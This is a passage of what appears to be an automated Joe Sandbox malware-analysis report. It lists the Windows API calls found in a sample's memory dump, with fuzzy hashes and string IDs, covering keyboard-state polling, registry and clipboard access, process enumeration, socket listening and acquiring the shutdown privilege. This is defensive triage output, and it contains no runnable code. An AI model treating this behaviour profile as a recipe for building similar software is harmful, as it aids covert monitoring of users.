                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009C64EB
                                    • FindClose.KERNEL32(00000000), ref: 009C6506
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                    • String ID: \*.*
                                    • API String ID: 2643075503-1173974218
                                    • Opcode ID: fc6604c3e9d321dbfd6f33bdf8acffc3a0180945136ba1bad700f36a57311fa2
                                    • Instruction ID: 7457d804b62220d72783b97de051c15627e43f1bd8c10b9e500d63f25a4cff95
                                    • Opcode Fuzzy Hash: fc6604c3e9d321dbfd6f33bdf8acffc3a0180945136ba1bad700f36a57311fa2
                                    • Instruction Fuzzy Hash: 413121B2808388AAC721DBE48885EDBB7ECAB96310F44491EF5D9C3141EB35D54987A7
                                    APIs
                                      • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E328E
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009E332D
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009E33C5
                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 009E3604
                                    • RegCloseKey.ADVAPI32(00000000), ref: 009E3611
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                    • String ID:
                                    • API String ID: 1240663315-0
                                    • Opcode ID: 6b3185801c3458733973a8780eefd7b7288fd397497f074f49069eb60b8163c4
                                    • Instruction ID: 5c1c4b0427857c5ea6c36ab3ac934a1b5d7c3e396a8e68c61c3ed8dfaa41598a
                                    • Opcode Fuzzy Hash: 6b3185801c3458733973a8780eefd7b7288fd397497f074f49069eb60b8163c4
                                    • Instruction Fuzzy Hash: A2E13A71604200AFCB15DF69C995E2ABBE8EF88714B04C96DF44ADB3A1DB30ED05CB52
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 009C2B5F
                                    • GetAsyncKeyState.USER32(000000A0), ref: 009C2BE0
                                    • GetKeyState.USER32(000000A0), ref: 009C2BFB
                                    • GetAsyncKeyState.USER32(000000A1), ref: 009C2C15
                                    • GetKeyState.USER32(000000A1), ref: 009C2C2A
                                    • GetAsyncKeyState.USER32(00000011), ref: 009C2C42
                                    • GetKeyState.USER32(00000011), ref: 009C2C54
                                    • GetAsyncKeyState.USER32(00000012), ref: 009C2C6C
                                    • GetKeyState.USER32(00000012), ref: 009C2C7E
                                    • GetAsyncKeyState.USER32(0000005B), ref: 009C2C96
                                    • GetKeyState.USER32(0000005B), ref: 009C2CA8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: 6b40cfb5cfc03c5aace16e8d474b22b1d0ce891354062f07849239b34a64ecfb
                                    • Instruction ID: cb89be99190bcde77a74580a86ff6bbd66c60aab35a1646ba3896017a9bccba8
                                    • Opcode Fuzzy Hash: 6b40cfb5cfc03c5aace16e8d474b22b1d0ce891354062f07849239b34a64ecfb
                                    • Instruction Fuzzy Hash: 7F41C734D447C96DFF359BA48814BB9BEA86F22344F04809DD9C6562C2DBA49DC8C7A3
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                    • String ID:
                                    • API String ID: 1737998785-0
                                    • Opcode ID: 3abfa4217d812e7e35058d68011b5ee7b4c91f520d2004db1cd36ac9450e8513
                                    • Instruction ID: 65deb1d6a3221a6a3e0d3ced408760198d60ce233975d891181f6321385ed1ac
                                    • Opcode Fuzzy Hash: 3abfa4217d812e7e35058d68011b5ee7b4c91f520d2004db1cd36ac9450e8513
                                    • Instruction Fuzzy Hash: 1F21A336340214AFDB11EF98EC49F6D77A9EF84710F04841AF94ADB2A1DB35EC028B51
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                      • Part of subcall function 0099B63C: GetCursorPos.USER32(000000FF), ref: 0099B64F
                                      • Part of subcall function 0099B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0099B66C
                                      • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000001), ref: 0099B691
                                      • Part of subcall function 0099B63C: GetAsyncKeyState.USER32(00000002), ref: 0099B69F
                                    • 6F58C580.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 009EED3C
                                    • 6F58C6F0.COMCTL32 ref: 009EED42
                                    • ReleaseCapture.USER32 ref: 009EED48
                                    • SetWindowTextW.USER32(?,00000000), ref: 009EEDF0
                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 009EEE03
                                    • NtdllDialogWndProc_W.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 009EEEDC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AsyncStateWindow$C580CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                    • API String ID: 351792193-2107944366
                                    • Opcode ID: 2e2df6e4c7e927b0d8a241fc2283092a2fae1c023dd35d730a9546f4bda0679d
                                    • Instruction ID: 27a822b81a02542aac2ffff546cf28f8d2d324f3e4bad50e0de5851aff05bc96
                                    • Opcode Fuzzy Hash: 2e2df6e4c7e927b0d8a241fc2283092a2fae1c023dd35d730a9546f4bda0679d
                                    • Instruction Fuzzy Hash: F651A978204304AFD710EF64CC86F6AB7E8FB88304F00491DF585962E2DB71E945CB52
                                    APIs
                                      • Part of subcall function 009B9ABF: CLSIDFromProgID.OLE32 ref: 009B9ADC
                                      • Part of subcall function 009B9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 009B9AF7
                                      • Part of subcall function 009B9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 009B9B05
                                      • Part of subcall function 009B9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 009B9B15
                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 009DC235
                                    • _memset.LIBCMT ref: 009DC242
                                    • _memset.LIBCMT ref: 009DC360
                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 009DC38C
                                    • CoTaskMemFree.OLE32(?), ref: 009DC397
                                    Strings
                                    • NULL Pointer assignment, xrefs: 009DC3E5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                    • String ID: NULL Pointer assignment
                                    • API String ID: 1300414916-2785691316
                                    • Opcode ID: de721af04d4148b496740198d0c26322ac1cb4de14ffdc2e87a0a645c3be8779
                                    • Instruction ID: a256952599308d79ee1b72802870b987562f9fb52245d650be862a561662669d
                                    • Opcode Fuzzy Hash: de721af04d4148b496740198d0c26322ac1cb4de14ffdc2e87a0a645c3be8779
                                    • Instruction Fuzzy Hash: 33914DB1D00219ABDB10DFA4DC91FEEBBB9EF44710F10815AF515A7291DB70AA45CFA0
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • GetSystemMetrics.USER32(0000000F), ref: 009F016D
                                    • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 009F038D
                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009F03AB
                                    • InvalidateRect.USER32(?,00000000,00000001,?), ref: 009F03D6
                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009F03FF
                                    • ShowWindow.USER32(00000003,00000000), ref: 009F0421
                                    • NtdllDialogWndProc_W.USER32(?,00000005,?,?), ref: 009F0440
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
                                    • String ID:
                                    • API String ID: 2922825909-0
                                    • Opcode ID: ea6b5eb1631e1079ec4f35cf3c603381a6eb7d1dfaadb1844aa95c35e67fad94
                                    • Instruction ID: 870bff5ad7d396cfcf0dc806e510c46153854778e8aa92b245e75b9cf895f7f3
                                    • Opcode Fuzzy Hash: ea6b5eb1631e1079ec4f35cf3c603381a6eb7d1dfaadb1844aa95c35e67fad94
                                    • Instruction Fuzzy Hash: 2EA1DF3560061AEFDB18CF68C9857FDBBB9BF88700F048115EE58A7291E774AD61CB90
                                    APIs
                                      • Part of subcall function 009BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009BB180
                                      • Part of subcall function 009BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009BB1AD
                                      • Part of subcall function 009BB134: GetLastError.KERNEL32 ref: 009BB1BA
                                    • ExitWindowsEx.USER32(?,00000000), ref: 009C7A0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                    • String ID: $@$SeShutdownPrivilege
                                    • API String ID: 2234035333-194228
                                    • Opcode ID: 536fcabbc723ae04b8afed5e0986fc00723bdd56d15b5afd6129665408c6bdbd
                                    • Instruction ID: 9d8a8e8e49ab33002ccdefe6dda3ed9ee2301d731b5cc3ebb08dcd2c8c000b9f
                                    • Opcode Fuzzy Hash: 536fcabbc723ae04b8afed5e0986fc00723bdd56d15b5afd6129665408c6bdbd
                                    • Instruction Fuzzy Hash: 4A01A772E582156AF72C66F8DC5AFBFB25C9B04750F141C2CFD53A20D2D5A49E0189B2
                                    APIs
                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009D8CA8
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D8CB7
                                    • bind.WSOCK32(00000000,?,00000010), ref: 009D8CD3
                                    • listen.WSOCK32(00000000,00000005), ref: 009D8CE2
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D8CFC
                                    • closesocket.WSOCK32(00000000,00000000), ref: 009D8D10
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                    • String ID:
                                    • API String ID: 1279440585-0
                                    • Opcode ID: e302c04855cdc2d18b486ebf56113aaf5c25bbf8c420d46d80ec9ca3b01f1f03
                                    • Instruction ID: 05fed89f2c06e2370de31233ba316a9d9311d968c7fa5ae1ce5b7d466845e3a1
                                    • Opcode Fuzzy Hash: e302c04855cdc2d18b486ebf56113aaf5c25bbf8c420d46d80ec9ca3b01f1f03
                                    • Instruction Fuzzy Hash: 2121A372600204EFCB10EFA8CD45B6EB7A9EF88714F148559F956A73D2CB70AD42CB61
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009C6554
                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 009C6564
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 009C6583
                                    • __wsplitpath.LIBCMT ref: 009C65A7
                                    • _wcscat.LIBCMT ref: 009C65BA
                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009C65F9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                    • String ID:
                                    • API String ID: 1605983538-0
                                    • Opcode ID: c37b9ac452bb42035f03e978ae19fa4278e9829ccffc863bb5983e9f536bc87a
                                    • Instruction ID: badf1b2a0c68fff2935bbda99ac17583badb0f099fccaa8e63079f1a7a80a860
                                    • Opcode Fuzzy Hash: c37b9ac452bb42035f03e978ae19fa4278e9829ccffc863bb5983e9f536bc87a
                                    • Instruction Fuzzy Hash: 9D216571D00258ABDB10EBA4CD89FDDB7BCAB49300F5004A9F545E7141DB759F85CBA2
                                    APIs
                                      • Part of subcall function 009DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 009DA84E
                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 009D9296
                                    • WSAGetLastError.WSOCK32(00000000,00000000), ref: 009D92B9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorLastinet_addrsocket
                                    • String ID:
                                    • API String ID: 4170576061-0
                                    • Opcode ID: c300bea4e2389986247adeefdff0603ca79dd75dbc43d74ef4f4d78668ffa7be
                                    • Instruction ID: 771fa28d72070523e1680dbec2e050a728fdfbe57307ea47181d8f097940e874
                                    • Opcode Fuzzy Hash: c300bea4e2389986247adeefdff0603ca79dd75dbc43d74ef4f4d78668ffa7be
                                    • Instruction Fuzzy Hash: 5F41AE71600204AFDB14BB68CC82F7E77EDEF84728F148449F956AB392DA749D028B91
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 009CEB8A
                                    • _wcscmp.LIBCMT ref: 009CEBBA
                                    • _wcscmp.LIBCMT ref: 009CEBCF
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 009CEBE0
                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 009CEC0E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                    • String ID:
                                    • API String ID: 2387731787-0
                                    • Opcode ID: a6843325b70124bb656375e33b17f8122f5e8c740c7dbf024f3c90fbadc2a121
                                    • Instruction ID: 871bd9e65fe3259e14a0e87c76a288f6d0522bcfa891ffd89df18a948ae6999b
                                    • Opcode Fuzzy Hash: a6843325b70124bb656375e33b17f8122f5e8c740c7dbf024f3c90fbadc2a121
                                    • Instruction Fuzzy Hash: 5B419075A046019FCB08DF68C491FA9B7E8FF89324F10455DF95A8B3A1DB31E941CB92
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                    • String ID:
                                    • API String ID: 292994002-0
                                    • Opcode ID: c5ad20497cd6a2e696a5a64da754b0b2b7dfc53fa74298863a61749a15a5b853
                                    • Instruction ID: bc45ab10fddfb9ab752836a2167f6c38950a48288aae0fc26ea3264da7eff6ed
                                    • Opcode Fuzzy Hash: c5ad20497cd6a2e696a5a64da754b0b2b7dfc53fa74298863a61749a15a5b853
                                    • Instruction Fuzzy Hash: B5119D327042546FE7226FAADC44B6FBB9CEF84760B050429F84AD7281DF30ED0386A4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                    • API String ID: 0-1546025612
                                    • Opcode ID: f5724729d5a52bf795f744eea8b682e295c60e778857d7ee0f2af473dc3427a1
                                    • Instruction ID: 959dd899b483742326112b514e45fe2be009fc00e5dde4bea0682cf4dba4a18b
                                    • Opcode Fuzzy Hash: f5724729d5a52bf795f744eea8b682e295c60e778857d7ee0f2af473dc3427a1
                                    • Instruction Fuzzy Hash: 3492A071E0021ACBEF24DF58D9807BDB7B1BB54314F1886AAE816AB380D7759D81CF91
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0099E014,75920AE0,0099DEF1,00A1DC38,?,?), ref: 0099E02C
                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0099E03E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                    • API String ID: 2574300362-192647395
                                    • Opcode ID: 94207c3a3dd7b95829e4a21ea1a3e605c1d1ae6fa4e97c0f4e084e9d5f12bcc6
                                    • Instruction ID: 20ddedc2f1f2797698c99358655e8380c9ae7b1221c3310d452756bd2b99d16c
                                    • Opcode Fuzzy Hash: 94207c3a3dd7b95829e4a21ea1a3e605c1d1ae6fa4e97c0f4e084e9d5f12bcc6
                                    • Instruction Fuzzy Hash: E1D0C771504716AFDB31DFE5EC09762BAD9BB08711F288919F495D2150FBB4D8828750
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • GetCursorPos.USER32(?), ref: 009EF211
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009FE4C0,?,?,?,?,?), ref: 009EF226
                                    • GetCursorPos.USER32(?), ref: 009EF270
                                    • NtdllDialogWndProc_W.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,009FE4C0,?,?,?), ref: 009EF2A6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                    • String ID:
                                    • API String ID: 1423138444-0
                                    • Opcode ID: 5d686267100d5db8431bf0578860acb661fd95a0180f1e9d0c68776afd1df4d9
                                    • Instruction ID: e85f05f03a2b8b6e5b559ee0c56a4c30317a0a4f54f451558637eac4f04e100f
                                    • Opcode Fuzzy Hash: 5d686267100d5db8431bf0578860acb661fd95a0180f1e9d0c68776afd1df4d9
                                    • Instruction Fuzzy Hash: 7F219E39600018AFCB16CF99DC68EEABBB9EB4A310F04406AFA154B2A1D3359D52DB50
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • NtdllDialogWndProc_W.USER32(?,00000020,?,00000000), ref: 0099B5A5
                                    • GetClientRect.USER32(?,?), ref: 009FE69A
                                    • GetCursorPos.USER32(?), ref: 009FE6A4
                                    • ScreenToClient.USER32(?,?), ref: 009FE6AF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                    • String ID:
                                    • API String ID: 1010295502-0
                                    • Opcode ID: 88ee13d0e4bff4e522bbb5c71c1b0444a3db0db6971eac334aeb63d8e96b0453
                                    • Instruction ID: 8d5bd707d78c8beade0e9fcd8ef7a241bb451f7eea54f7da34948f984c3f9ed7
                                    • Opcode Fuzzy Hash: 88ee13d0e4bff4e522bbb5c71c1b0444a3db0db6971eac334aeb63d8e96b0453
                                    • Instruction Fuzzy Hash: 5F11363690002EBFCF10DF98DD459AE77B9EF49305F410455F905E7150D738AA92CBA2
                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009C13DC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                     • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: ($|
                                    • API String ID: 1659193697-1631851259
                                    • Opcode ID: 7cfc07b630bac23c8bea979ef15bc4ff107f683f8652deb1d42c5021765b119b
